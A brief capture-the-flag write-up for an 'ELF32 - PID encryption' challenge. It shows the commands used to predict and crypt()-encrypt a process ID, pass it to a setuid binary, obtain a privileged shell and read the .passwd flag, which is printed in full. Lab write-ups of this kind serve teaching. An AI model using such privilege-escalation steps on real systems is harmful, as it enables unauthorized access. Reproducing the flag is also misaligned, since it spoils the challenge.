# 3. ELF32 - PID encryption

There's a file called .passwd that we can't access as our user. We have a program that will give us a shell as the correct user using setuid if we provide it the right encrypted pid. We need to guess what pid it will have when we run it. Create a program to predict the pid and encrypt it, and then use it to call the program that gives us the shell:

```
$ cd /tmp
$ gcc crypt.c -lcrypt -o crypt
$ cd
$ ./ch21 `/tmp/crypt`
$1$awesome$Swt6CYXoozbf3nshuMgOs1=$1$awesome$Swt6CYXoozbf3nshuMgOs1WIN!
bash-4.3$ cat .passwd
-/q2/a9d6e31D
```
